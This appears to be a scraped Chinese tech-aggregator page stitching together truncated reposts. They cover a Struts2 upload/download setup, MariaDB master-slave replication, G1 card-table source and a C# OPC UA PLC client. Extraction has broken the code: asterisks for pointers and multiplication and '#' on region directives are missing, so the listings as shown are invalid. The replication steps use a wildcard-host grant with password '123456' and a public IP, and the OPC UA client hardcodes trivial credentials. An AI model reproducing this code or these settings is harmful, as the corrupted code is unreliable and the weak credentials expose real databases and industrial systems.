指定input逻辑视图,即不符合上传要求,被fileUpload拦截器拦截后,返回的视图页面 --><result name="input">/uploadFile.jsp</result></action> <action name="docDownload" class="nuc.sw.action.DocDownloadAction"><!-- 指定结果类型为stream --><result type="stream"><!-- 指定下载文件的文件类型 text/plain表示纯文本 --><param name="contentType">application/msword,text/plain</param><!-- 指定下载文件的入口输入流 --><param name="inputName">inputStream</param><!-- 指定下载文件的处理方式与文件保存名 attachment表示以附件形式下载,也可以用inline表示内联即在浏览器中直接显示,默认值为inline --><param name="contentDisposition">attachment;filename="${downloadFileName}"</param><!-- 指定下载文件的缓冲区大小,默认为1024 --><param name="bufferSize">40960</param></result></action><action name="loginAction" class="nuc.sw.action.LoginAction" method="loginMethod"><result name="loginOK">/uploadFile.jsp</result><result name="loginFail">/login.jsp</result><result name="input">/login.jsp</result></action> </package></struts> /20171105_shiyan_upanddown/WebContent/login.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>登录页</title><s:head/></head><body><s:actionerror/><s:fielderror fieldName="err"></s:fielderror><s:form action="loginAction" method="post"> <s:textfield label="用户名" name="username"></s:textfield><s:password label="密码" name="password"></s:password><s:submit value="登陆"></s:submit></s:form></body></html> /20171105_shiyan_upanddown/WebContent/showFile.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>显示上传文档</title></head><body><center><font style="font-size:18px;color:red">上传者:<s:property value="name"/></font><table width="45%" cellpadding="0" cellspacing="0" border="1"><tr><th>文件名称</th><th>上传者</th><th>上传时间</th></tr><s:iterator value="uploadFileName" status="st" var="doc"><tr><td align="center"><a href="docDownload.action?downPath=upload/<s:property value="doc"/>"><s:property value="doc"/> </a></td><td align="center"><s:property value="name"/></td><td align="center"><s:date name="createTime" format="yyyy-MM-dd HH:mm:ss"/></td></tr></s:iterator></table></center></body></html> /20171105_shiyan_upanddown/WebContent/uploadFile.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>多文件上传</title></head><body><center><s:form action="docUpload" method="post" enctype="multipart/form-data"><s:textfield name="name" label="姓名" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:submit value="确认上传" align="center"/></s:form></center></body></html> 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_34101492/article/details/78811741。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-12 20:53:42
140
转载
转载文章
...log-slave-updates=True slave更新是否记入日志sync-master-info=1 值为1确保信息不会丢失slave-parallel-threads=3 同时启动多少个复制线程,最多与要复制的数据库数量相等即可binlog-checksum=CRC32 效验码master-verify-checksum=1 启动主服务器效验slave-sql-verify-checksum=1 启动从服务器效验[galera][embedded][mariadb][mariadb-10.6][root@mster-k8s mysql] 11.2 修改从库配置 [mysqld]character-set-server=utf8collation-server=utf8_general_ciserver_id=14log-bin= mysql-bin log-bin是二进制文件relay_log = relay-bin 中继日志, 后面指定存放位置。如果只是指定名字,默认存放在/var/lib/mysql下lower_case_table_names=1 11.3 重启主库和从库服务 systemctl restart mariad 11.4 master节点配置 MariaDB [huawei]> grant replication slave, replication client on . to 'liu'@'%' identified by '123456';Query OK, 0 rows affected (0.001 sec)MariaDB [huawei]> show master status;+------------------+----------+--------------+------------------+| File | Position | Binlog_Do_DB | Binlog_Ignore_DB |+------------------+----------+--------------+------------------+| mysql-bin.000001 | 4990 | | |+------------------+----------+--------------+------------------+1 row in set (0.000 sec)MariaDB [huawei]> select binlog_gtid_pos('mysql-bin.000001', 4990 );+-------------------------------------------+| binlog_gtid_pos('mysql-bin.000001', 4990) |+-------------------------------------------+| 0-13-80 |+-------------------------------------------+1 row in set (0.000 sec)MariaDB [huawei]> flush privileges; 11.5 slave节点配置 MariaDB [(none)]> set global gtid_slave_pos='0-13-80';Query OK, 0 rows affected (0.004 sec)MariaDB [(none)]> change master to master_host='101.34.141.216',master_user='liu',master_password='123456',master_use_gtid=slave_pos;Query OK, 0 rows affected (0.008 sec)MariaDB [(none)]> start slave;Query OK, 0 rows affected (0.005 sec)MariaDB [(none)]> 11.6 验证salve状态 MariaDB [(none)]> show slave status\G 1. row Slave_IO_State: Waiting for master to send eventMaster_Host: 101.34.141.216Master_User: liuMaster_Port: 3306Connect_Retry: 60Master_Log_File: mysql-bin.000001Read_Master_Log_Pos: 13260Relay_Log_File: relay-bin.000002Relay_Log_Pos: 10246Relay_Master_Log_File: mysql-bin.000001Slave_IO_Running: YesSlave_SQL_Running: YesReplicate_Do_DB: Replicate_Ignore_DB: Replicate_Do_Table: Replicate_Ignore_Table: Replicate_Wild_Do_Table: Replicate_Wild_Ignore_Table: Last_Errno: 0Last_Error: Skip_Counter: 0Exec_Master_Log_Pos: 13260Relay_Log_Space: 10549Until_Condition: NoneUntil_Log_File: Until_Log_Pos: 0Master_SSL_Allowed: NoMaster_SSL_CA_File: 本篇文章为转载内容。原文链接:https://blog.csdn.net/l363130002/article/details/126121255。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-12 10:11:01
310
转载
转载文章
...eed to be updated to reflect any change to this.// This code can typically be found by searching for the byte_map_base() method.STATIC_ASSERT(sizeof(CardValue) == 1);protected:// The declaration order of these const fields is important; see the// constructor before changing.const MemRegion _whole_heap; // the region covered by the card tableconst size_t _page_size; // page size used when mapping _byte_mapsize_t _byte_map_size; // in bytesCardValue _byte_map; // the card marking arrayCardValue _byte_map_base;// Some barrier sets create tables whose elements correspond to parts of// the heap; the CardTableBarrierSet is an example. Such barrier sets will// normally reserve space for such tables, and commit parts of the table// "covering" parts of the heap that are committed. At most one covered// region per generation is needed.static constexpr int max_covered_regions = 2;// The covered regions should be in address order.MemRegion _covered[max_covered_regions];// The last card is a guard card; never committed.MemRegion _guard_region;inline size_t compute_byte_map_size(size_t num_bytes);enum CardValues {clean_card = (CardValue)-1,dirty_card = 0,CT_MR_BS_last_reserved = 1};// a word's worth (row) of clean card valuesstatic const intptr_t clean_card_row = (intptr_t)(-1);// CardTable entry sizestatic uint _card_shift;static uint _card_size;static uint _card_size_in_words;size_t last_valid_index() const {return cards_required(_whole_heap.word_size()) - 1;}private:void initialize_covered_region(void region0_start, void region1_start);MemRegion committed_for(const MemRegion mr) const;public:CardTable(MemRegion whole_heap);virtual ~CardTable() = default;void initialize(void region0_start, void region1_start);// Barrier set functions.// Initialization utilities; covered_words is the size of the covered region// in, um, words.inline size_t cards_required(size_t covered_words) const {assert(is_aligned(covered_words, _card_size_in_words), "precondition");return covered_words / _card_size_in_words;}// Dirty the bytes corresponding to "mr" (not all of which must be// covered.)void dirty_MemRegion(MemRegion mr);// Clear (to clean_card) the bytes entirely contained within "mr" (not// all of which must be covered.)void clear_MemRegion(MemRegion mr);// Return true if "p" is at the start of a card.bool is_card_aligned(HeapWord p) {CardValue pcard = byte_for(p);return (addr_for(pcard) == p);}// Mapping from address to card marking array entryCardValue byte_for(const void p) const {assert(_whole_heap.contains(p),"Attempt to access p = " PTR_FORMAT " out of bounds of "" card marking array's _whole_heap = [" PTR_FORMAT "," PTR_FORMAT ")",p2i(p), p2i(_whole_heap.start()), p2i(_whole_heap.end()));CardValue result = &_byte_map_base[uintptr_t(p) >> _card_shift];assert(result >= _byte_map && result < _byte_map + _byte_map_size,"out of bounds accessor for card marking array");return result;}// The card table byte one after the card marking array// entry for argument address. Typically used for higher bounds// for loops iterating through the card table.CardValue byte_after(const void p) const {return byte_for(p) + 1;}void invalidate(MemRegion mr);// Provide read-only access to the card table array.const CardValue byte_for_const(const void p) const {return byte_for(p);}const CardValue byte_after_const(const void p) const {return byte_after(p);}// Mapping from card marking array entry to address of first wordHeapWord addr_for(const CardValue p) const {assert(p >= _byte_map && p < _byte_map + _byte_map_size,"out of bounds access to card marking array. p: " PTR_FORMAT" _byte_map: " PTR_FORMAT " _byte_map + _byte_map_size: " PTR_FORMAT,p2i(p), p2i(_byte_map), p2i(_byte_map + _byte_map_size));// As _byte_map_base may be "negative" (the card table has been allocated before// the heap in memory), do not use pointer_delta() to avoid the assertion failure.size_t delta = p - _byte_map_base;HeapWord result = (HeapWord) (delta << _card_shift);assert(_whole_heap.contains(result),"Returning result = " PTR_FORMAT " out of bounds of "" card marking array's _whole_heap = [" PTR_FORMAT "," PTR_FORMAT ")",p2i(result), p2i(_whole_heap.start()), p2i(_whole_heap.end()));return result;}// Mapping from address to card marking array index.size_t index_for(void p) {assert(_whole_heap.contains(p),"Attempt to access p = " PTR_FORMAT " out of bounds of "" card marking array's _whole_heap = [" PTR_FORMAT "," PTR_FORMAT ")",p2i(p), p2i(_whole_heap.start()), p2i(_whole_heap.end()));return byte_for(p) - _byte_map;}CardValue byte_for_index(const size_t card_index) const {return _byte_map + card_index;}// Resize one of the regions covered by the remembered set.void resize_covered_region(MemRegion new_region);// Card-table-RemSet-specific things.static uintx ct_max_alignment_constraint();static uint card_shift() {return _card_shift;}static uint card_size() {return _card_size;}static uint card_size_in_words() {return _card_size_in_words;}static constexpr CardValue clean_card_val() { return clean_card; }static constexpr CardValue dirty_card_val() { return dirty_card; }static intptr_t clean_card_row_val() { return clean_card_row; }// Initialize card sizestatic void initialize_card_size();// Card marking array base (adjusted for heap low boundary)// This would be the 0th element of _byte_map, if the heap started at 0x0.// But since the heap starts at some higher address, this points to somewhere// before the beginning of the actual _byte_map.CardValue byte_map_base() const { return _byte_map_base; }virtual bool is_in_young(const void p) const = 0;}; class G1CardTable : public CardTable {friend class VMStructs;friend class G1CardTableChangedListener;G1CardTableChangedListener _listener;public:enum G1CardValues {g1_young_gen = CT_MR_BS_last_reserved << 1,// During evacuation we use the card table to consolidate the cards we need to// scan for roots onto the card table from the various sources. Further it is// used to record already completely scanned cards to avoid re-scanning them// when incrementally evacuating the old gen regions of a collection set.// This means that already scanned cards should be preserved.//// The merge at the start of each evacuation round simply sets cards to dirty// that are clean; scanned cards are set to 0x1.//// This means that the LSB determines what to do with the card during evacuation// given the following possible values://// 11111111 - clean, do not scan// 00000001 - already scanned, do not scan// 00000000 - dirty, needs to be scanned.//g1_card_already_scanned = 0x1};static const size_t WordAllClean = SIZE_MAX;static const size_t WordAllDirty = 0;STATIC_ASSERT(BitsPerByte == 8);static const size_t WordAlreadyScanned = (SIZE_MAX / 255) g1_card_already_scanned;G1CardTable(MemRegion whole_heap): CardTable(whole_heap), _listener() {_listener.set_card_table(this);}static CardValue g1_young_card_val() { return g1_young_gen; }static CardValue g1_scanned_card_val() { return g1_card_already_scanned; }void verify_g1_young_region(MemRegion mr) PRODUCT_RETURN;void g1_mark_as_young(const MemRegion& mr);size_t index_for_cardvalue(CardValue const p) const {return pointer_delta(p, _byte_map, sizeof(CardValue));}// Mark the given card as Dirty if it is Clean. Returns whether the card was// Clean before this operation. This result may be inaccurate as it does not// perform the dirtying atomically.inline bool mark_clean_as_dirty(CardValue card);// Change Clean cards in a (large) area on the card table as Dirty, preserving// already scanned cards. Assumes that most cards in that area are Clean.inline void mark_range_dirty(size_t start_card_index, size_t num_cards);// Change the given range of dirty cards to "which". All of these cards must be Dirty.inline void change_dirty_cards_to(CardValue start_card, CardValue end_card, CardValue which);inline uint region_idx_for(CardValue p);static size_t compute_size(size_t mem_region_size_in_words) {size_t number_of_slots = (mem_region_size_in_words / _card_size_in_words);return ReservedSpace::allocation_align_size_up(number_of_slots);}// Returns how many bytes of the heap a single byte of the Card Table corresponds to.static size_t heap_map_factor() { return _card_size; }void initialize(G1RegionToSpaceMapper mapper);bool is_in_young(const void p) const override;}; 以位为粒度的位图能准确描述每一个字的引用关系,但是一个位通常包含的信息太少,只能描述2个状态:引用还是未引用。实际应用中JVM在垃圾回收的时候需要更多的状态,如果增加至一个字节来描述状态,则位图需要256KB的空间,这个数字太大,开销占了25%。所以一个可能的做法位图不再描述一个字,而是一个区域,JVM选择512字节为单位,即用一个字节描述512字节的引用关系。选择一个区域除了空间利用率的问题之外,实际上还有现实的意义。我们知道Java对象实际上不是一个字能描述的(有一个参数可以控制对象最小对齐的大小,默认是8字节,实际上Java在JVM中还有一些附加信息,所以对齐后最小的Java对象是16字节),很多Java对象可能是几十个字节或者几百个字节,所以用一个字节描述一个区域是有意义的。但是我没有找到512的来源,为什么512效果最好?没有相应的数据来支持这个数字,而且这个值不可以配置,不能修改,但是有理由相信512字节的区域是为了节约内存额外开销。按照这个值,1MB的内存只需要2KB的额外空间就能描述引用关系。这又带来另一个问题,就是512字节里面的内存可能被引用多次,所以这是一个粗略的关系描述,那么在使用的时候需要遍历这512字节。 再举一个例子,假设有两个对象B、C都在这512字节的区域内。为了方便处理,记录对象引用关系的时候,都使用对象的起始位置,然后用这个地址和512对齐,因此B和C对象的卡表指针都指向这一个卡表的位置。那么对于引用处理也有可有两种处理方法:·处理的时候会以堆分区为处理单位,遍历整个堆分区,在遍历的时候,每次都会以对象大小为步长,结合卡表,如果该卡表中对应的位置被设置,则说明对象和其他分区的对象发生了引用。具体内容在后文中介绍Refine的时候还会详细介绍。·处理的时候借助于额外的数据结构,找到真正对象的位置,而不需要从头开始遍历。在后文的并发标记处理时就使用了这种方法,用于找到第一个对象的起始位置。在G1除了512字节粒度的卡表之外,还有bitMap,例如使用bitMap可以描述一个分区对另外一个分区的引用情况。在JVM中bitMap使用非常多,例如还可以描述内存的分配情况。 在G1除了512字节粒度的卡表之外,还有bitMap,例如使用bitMap可以描述一个分区对另外一个分区的引用情况。在JVM中bitMap使用非常多,例如还可以描述内存的分配情况。G1在混合收集算法中用到了并发标记。在并发标记的时候使用了bitMap来描述对象的分配情况。例如1MB的分区可以用16KB(16KB×ObjectAlignmentInBytes×8=1MB)来描述,即16KB额外的空间。其中ObjectAlignmentInBytes是8字节,指的是对象对齐,第二个8是指一个字节有8位。即每一个位可以描述64位。例如一个对象长度对齐之后为24字节,理论上它占用3个位来描述这个24字节已被使用了,实际上并不需要,在标记的时候只需要标记这3个位中的第一个位,再结合堆分区对象的大小信息就能准确找出。其最主要的目的是为了效率,标记一个位和标记3个位相比能节约不少时间,如果对象很大,则更划算。这些都是源码的实现细节,大家在阅读源码时需要细细斟酌。 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_16500963/article/details/132133125。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-12-16 20:37:50
246
转载
转载文章
...bject> readResult = null; //设备标签数据缓存private int stepLen = 250; //标签变量的步长设置private string groupNamePrefix = "DB"; //数据块号前缀private string childTagFlag = "~"; //子元素标签标志符private System.Threading.Thread innerReadThread = null; //内部读取线程对象private int innerReadRate = 1000; //内部读取频率endregionregion 属性定义/// <summary>/// OPCUA Server Url/// </summary>public string OpcUaServerUrl{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).OpcUaServerUrl;return "opc.tcp://192.168.1.102:4840";//return "opc.tcp://192.168.100.1:4840";//return "opc.tcp://192.168.100.2:4840";} }/// <summary>/// 要连接的OPCUA服务器上的服务名/// </summary>public string OpcUaServiceName{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).OpcUaServiceName;return "[UaServer@cMT-9F1F] [None] [None] [opc.tcp://192.168.1.102:4840/G01]";//return "[UaServer@cMT-EAB9] [None] [None] [opc.tcp://192.168.100.1:4840/G01]";//return "[UaServer@cMT-EA5B] [None] [None] [opc.tcp://192.168.100.2:4840/G02]";//return "[UaServer@cMT-EA5B] [None] [None] [opc.tcp://192.168.100.2:4840/G01]";} }/// <summary>/// 要连接的OPCUA服务器上指定服务名下的PLC的名称/// </summary>public string PLCName{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).PLCName;//return "Feeding";return "Siemens_192.168.2.1";//return "Rockwell_192.168.1.10";} }/// <summary>/// OPCUA服务器的访问账户/// </summary>public string Account{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).Account;return "user1";} }/// <summary>/// OPCUA服务器的访问密码/// </summary>public string Password{get{//return (this.Main.ConnType as Mesnac.Equips.Connection.OPCUA.ConnType).Password;return "1";} }endregionregion BaseEquip成员实现/// <summary>/// 打开连接设备/// </summary>/// <returns>成功返回true,失败返回false</returns>public override bool Open(){lock (this){this._isClosing = false;if (this._isOpen == true && this.myOpcHelper != null){return true;}this.State = false;this.myOpcHelper = new OPCUAClass();this.dicTags = this.myOpcHelper.ConnectOPCUA(this.OpcUaServerUrl, this.Account, this.Password, this.OpcUaServiceName, this.PLCName); //连接OPCServerif (this.dicTags == null || this.dicTags.Count == 0){this.myOpcHelper = null;Console.WriteLine("OPC连接失败!");this.State = false;return false;}else{this.State = true;this._isOpen = true;region 初始化读取结果this.readResult = new Dictionary<string, object>();foreach (Equips.BaseInfo.Group group in this.Group.Values){if (!group.IsAutoRead){continue;}int groupMinStart = group.Start;int groupMaxEnd = group.Start + group.Len;int groupMaxLen = group.Len;foreach (Equips.BaseInfo.Group g in this.Group.Values){if (!g.IsAutoRead){continue;}if (g.Block == group.Block){if (g.Start < group.Start){groupMinStart = g.Start;}if (g.Start + g.Len > groupMaxEnd){groupMaxEnd = g.Start + g.Len;} }}groupMaxLen = groupMaxEnd - groupMinStart;int tagCount = groupMaxLen % this.stepLen == 0 ? groupMaxLen / this.stepLen : groupMaxLen / this.stepLen + 1;int currLen = 0;for (int i = 0; i < tagCount; i++){string tagName = String.Empty;if (tagCount == 1){tagName = String.Format("{0}-{1}", groupMinStart, groupMinStart + groupMaxLen - 1);currLen = groupMaxLen;}else if (i == tagCount - 1){tagName = String.Format("{0}-{1}", groupMinStart + (i this.stepLen), groupMinStart + (i this.stepLen) + (groupMaxLen % this.stepLen == 0 ? this.stepLen : groupMaxLen % this.stepLen) - 1);currLen = groupMaxLen % this.stepLen;}else{tagName = String.Format("{0}-{1}", groupMinStart + (i this.stepLen), groupMinStart + (i this.stepLen) + this.stepLen - 1);currLen = this.stepLen;}string tagFullName = String.Format("{0}{1}.{2}", groupNamePrefix, group.Block, tagName);if (!this.readResult.ContainsKey(tagFullName)){bool exists = false;region 判断读取结果标签组的范围是否包括了此标签 比如tagFullName DB5.220-299,在readResult中存在 DB5.200-299,则认为已存在,不需要再添加string[] beginend = null;int begin = 0;int end = 0;string[] startstop = tagFullName.Replace(String.Format("{0}{1}.", groupNamePrefix, group.Block), String.Empty).Split(new char[] { '-' });int start = 0;int stop = 0;bool parseResult = false;if (startstop.Length == 2){parseResult = int.TryParse(startstop[0], out start);if (parseResult){parseResult = int.TryParse(startstop[1], out stop);} }if (parseResult){int existsMinBegin = 0; //已存在标签的最小开始索引int existsMaxEnd = 0; //已存在标签的最大结束索引bool isContinue = true; //标签值是否连续string[] existsTags = this.readResult.Keys.ToArray<string>();foreach (string tag in existsTags){if (tag.StartsWith(String.Format("{0}{1}.", groupNamePrefix, group.Block)) && tag.Contains(".") && tag.Contains("-")){string[] tagname = tag.Split(new char[] { '.' });if (tagname.Length == 2){beginend = tagname[1].Split(new char[] { '-' });if (beginend.Length == 2){parseResult = int.TryParse(beginend[0], out begin);if (parseResult){parseResult = int.TryParse(beginend[1], out end);}region 计算最小开始索引和最大结束索引if (begin < existsMinBegin){existsMinBegin = begin;region 判断标签值是否连续if (existsMaxEnd != 0 && begin != existsMaxEnd + 1){isContinue = false;}endregion}if (end > existsMaxEnd){existsMaxEnd = end;}endregion} }if (parseResult){if (start >= begin && stop <= end){exists = true;break;}if (isContinue){if (start >= existsMinBegin && stop <= existsMaxEnd){exists = true;break;} }} }} }endregionif (!exists){ushort[] groupData = new ushort[currLen];this.readResult[tagFullName] = groupData;Console.WriteLine(tagFullName);} }}//int tagCount = group.Len % this.stepLen == 0 ? group.Len / this.stepLen : group.Len / this.stepLen + 1;//int currLen = 0;//for (int i = 0; i < tagCount; i++)//{// string tagName = String.Empty;// if (tagCount == 1)// {// tagName = String.Format("{0}-{1}", group.Start, group.Start + group.Len - 1);// currLen = group.Len;// }// else if (i == tagCount - 1)// {// tagName = String.Format("{0}-{1}", group.Start + (i this.stepLen), group.Start + (i this.stepLen) + (group.Len % this.stepLen == 0 ? this.stepLen : group.Len % this.stepLen) - 1);// currLen = group.Len % this.stepLen;// }// else// {// tagName = String.Format("{0}-{1}", group.Start + (i this.stepLen), group.Start + (i this.stepLen) + this.stepLen - 1);// currLen = this.stepLen;// }// string tagFullName = String.Format("{0}{1}.{2}", groupNamePrefix, group.Block, tagName);// if (!this.readResult.ContainsKey(tagFullName))// {// short[] groupData = new short[currLen];// this.readResult[tagFullName] = groupData;// }//} }endregionregion 开启内部定时读取if (this.innerReadThread == null){this.innerReadRate = this.Main.ReadHz / 2;this.innerReadThread = new System.Threading.Thread(this.InnerAutoRead);this.innerReadThread.Start();}endregion}return this.State;} }/// <summary>/// 从设备读取数据/// </summary>/// <param name="block">要读取的块号</param>/// <param name="start">要读取的起始字</param>/// <param name="len">要读取的长度</param>/// <param name="buff">读取成功后的输出数据</param>/// <returns>成功返回true,失败返回false</returns>public override bool Read(string block, int start, int len, out object[] buff){lock (this){buff = null;if (this._isClosing){return false;}string readstrflag = String.Format("{0}{1}.{2}-{3}", this.groupNamePrefix, block, start, start + len - 1);System.Text.StringBuilder sbtaglength = new System.Text.StringBuilder();string startTag = String.Empty;string groupName = String.Format("{0}{1}", this.groupNamePrefix, block); //要读取的OPCServer块List<ushort> groupData = new List<ushort>();List<string> groupTagNames = new List<string>();int startIndex = 0;try{if (!Open()){return false;}//return true;string[] keys = this.readResult.Keys.ToArray<string>();foreach (string key in keys){if (key.StartsWith(groupName) && key.Replace(String.Format("{0}.", groupName), String.Empty).Contains("-")){groupTagNames.Add(key);} }groupTagNames.Sort(); //对块标签进行排序foreach (string key in groupTagNames){if (String.IsNullOrEmpty(startTag)){startTag = key.Replace(String.Format("{0}.", groupName), String.Empty);}ushort[] values;if (this.readResult[key] is ushort[]){values = this.readResult[key] as ushort[];}else{values = new ushort[] { (ushort)this.readResult[key] };}sbtaglength.Append(String.Format("tagName={0}, buff length = {1}", key, values.Length));groupData.AddRange(values);}buff = new object[len];if (!String.IsNullOrEmpty(startTag)){string strStartIndex = startTag.Substring(0, startTag.IndexOf("-"));int.TryParse(strStartIndex, out startIndex);startIndex = start - startIndex;Array.Copy(groupData.ToArray(), startIndex, buff, 0, buff.Length);}else{}return true;}catch (Exception ex){Console.WriteLine(String.Join(";", groupTagNames.ToArray<string>()));Console.WriteLine("data length = " + groupData.Count);Console.WriteLine(this.Name + "读取失败[" + readstrflag + "]:" + ex.Message);Console.WriteLine(sbtaglength.ToString());this.State = false;return false;} }}/// <summary>/// 写入数据到设备/// </summary>/// <param name="block">要写入的块号</param>/// <param name="start">要写入的起始字</param>/// <param name="buff">要写如的数据</param>/// <returns>成功返回true,失败返回false</returns>public override bool Write(int block, int start, object[] buff){bool result = true;lock (this){try{if (this._isClosing){return false;}if (!Open()){return false;}bool isWrite = false;region 按标签变量写入string itemId = "";foreach (Equips.BaseInfo.Group group in this.Group.Values){if (group.Block == block.ToString()){foreach (Equips.BaseInfo.Data data in group.Data.Values){if (group.Start + data.Start == start && data.Len == buff.Length){if (this.dicTags.ContainsKey(data.Name)){itemId = this.dicTags[data.Name];}break;} }} }if (!String.IsNullOrEmpty(itemId)){UInt16[] intBuff = new UInt16[buff.Length];for (int i = 0; i < intBuff.Length; i++){intBuff[i] = 0;if (!UInt16.TryParse(buff[i].ToString(), out intBuff[i])){Console.WriteLine("在写入OPCUA标签时把buff中的元素转为UInt16类型失败!");} }result = this.myOpcHelper.WriteUInt16(itemId, intBuff);if (!result){Console.WriteLine(String.Format("标签变量[{0}]写入失败!", itemId));return false;}else{Console.WriteLine("按标签变量写入..." + itemId);isWrite = true;} }if (isWrite){return true;}endregionregion 按块写入region 先读取相应标签数数据string startTag = String.Empty;string groupName = String.Format("{0}{1}", this.groupNamePrefix, block); //要读取的OPCServer块List<ushort> groupData = new List<ushort>();string[] keys = readResult.Keys.Where(o => o.StartsWith(groupName) && o.Contains("-")).OrderBy(c => c).ToArray<string>();foreach (string key in keys){if (String.IsNullOrEmpty(startTag)){startTag = key.Replace(String.Format("{0}.", groupName), String.Empty);}string[] beginEnd = key.Replace(String.Format("{0}.", groupName), String.Empty).Split(new char[] { '-' });if (beginEnd.Length != 2){Console.WriteLine(String.Format("标签变量[{0}]未按约定方式命名,请按[DB块号].[起始字-结束字]方式标签变量进行命名!", String.Format("{0}.{1}", key)));return false;}int begin = 0;int end = 0;int.TryParse(beginEnd[0], out begin);int.TryParse(beginEnd[1], out end);region 写入之前,先读取一下PLC的值if ((start >= begin && start <= end) || ((start + buff.Length - 1) >= begin && (start + buff.Length - 1) <= end) || (start < begin && (start + buff.Length - 1) > end)){this.ReadTag(key);if (this.readResult.ContainsKey(key) && this.readResult[key] is Array){Console.WriteLine("read = " + key);groupData.AddRange(this.readResult[key] as ushort[]);}else{Console.WriteLine(String.Format("读取结果中不包含标签变量[{0}]的值!", String.Format("{0}", key)));} }else{if (this.readResult.ContainsKey(key) && this.readResult[key] is Array){Console.WriteLine("no read = " + key);groupData.AddRange(this.readResult[key] as ushort[]);} }endregion}endregionif (String.IsNullOrEmpty(startTag)){Console.WriteLine("写入失败,未在OPCUAserver中找到对应的标签,block = {0}, start = {1}, len = {2}", block, start, buff.Length);return false;}region 更新标签中对应的数据后,再写回OPCServerint startIndex = 0;string strStartIndex = startTag.Substring(0, startTag.IndexOf("-"));int.TryParse(strStartIndex, out startIndex);startIndex = start - startIndex;ushort[] newDataBuffer = groupData.ToArray();for (int i = 0; i < buff.Length; i++){ushort svalue = 0;ushort.TryParse(buff[i].ToString(), out svalue);newDataBuffer[startIndex + i] = svalue;}int index = 0;string[] keys2 = readResult.Keys.Where(o => o.StartsWith(groupName) && o.Contains("-")).OrderBy(c => c).ToArray<string>();foreach (string key2 in keys2){string[] beginEnd = key2.Replace(String.Format("{0}.", groupName), String.Empty).Split(new char[] { '-' });if (beginEnd.Length != 2){Console.WriteLine(String.Format("标签变量[{0}]未按约定方式命名,请按[DB块号].[起始字-结束字]方式标签变量进行命名!", String.Format("{0}", key2)));return false;}int begin = 0;int end = 0;int.TryParse(beginEnd[0], out begin);int.TryParse(beginEnd[1], out end);if ((start >= begin && start <= end) || ((start + buff.Length - 1) >= begin && (start + buff.Length - 1) <= end) || (start < begin && (start + buff.Length - 1) > end)){//Console.WriteLine("---------------------------------------------------------");//Console.WriteLine("start = " + start);//Console.WriteLine("start + buff.Length - 1 = " + (start + buff.Length -1));//Console.WriteLine("begin = " + begin);//Console.WriteLine("end = " + end);//Console.WriteLine("---------------------------------------------------------");if (!this.dicTags.ContainsKey(key2)){Console.WriteLine(String.Format("写入失败:标签变量[{0}]在OpcUA Server中未定义!", String.Format("{0}", key2)));return false;}int len = (this.readResult[key2] as ushort[]).Length;ushort[] tagDataBuff = new ushort[len];//Console.WriteLine("newDataBuff");//Console.WriteLine(String.Join(",", newDataBuffer));//Console.WriteLine("index = " + index);//Console.WriteLine("tagDataBuff.Length = " + tagDataBuff.Length);//Array.Copy(newDataBuffer, begin, tagDataBuff, 0, tagDataBuff.Length);int existsMinBegin = this.GetExistsMinBeginByBlock(block.ToString());Array.Copy(newDataBuffer, begin - existsMinBegin, tagDataBuff, 0, tagDataBuff.Length);index += tagDataBuff.Length;//Console.WriteLine("Write " + key2);//Console.WriteLine(String.Join(",", tagDataBuff));//Console.WriteLine("写入标签:" + this.dicTags[key2]);result = this.myOpcHelper.WriteUInt16(this.dicTags[key2], tagDataBuff);if (!result){Console.WriteLine(String.Format("向标签变量[{0}]中写入值失败!", String.Format("{0}", key2)));return false;}else{this.ReadTag(key2);Console.WriteLine("写入...");}//Console.WriteLine("---------------------------------------------------------");} }endregionendregionreturn result;}catch (Exception ex){Console.WriteLine(this.Name + "写入失败:" + ex.Message);return false;} }}/// <summary>/// 关闭方法,断开与设备的连接释放资源/// </summary>public override void Close(){try{this._isClosing = true;System.Threading.Thread.Sleep(this.Main.ReadHz);if (this.innerReadThread != null){this.innerReadThread.Abort();this.innerReadThread = null;} }catch (Exception ex){Console.WriteLine("关闭内部读取OPCUA线程异常:" + ex.Message);}try{if (this.myOpcHelper != null){this.myOpcHelper.Close();this.myOpcHelper = null;this.State = false;this._isOpen = false;} }catch (Exception ex){Console.WriteLine("关于与OPCUA服务连接异常:" + ex.Message);} 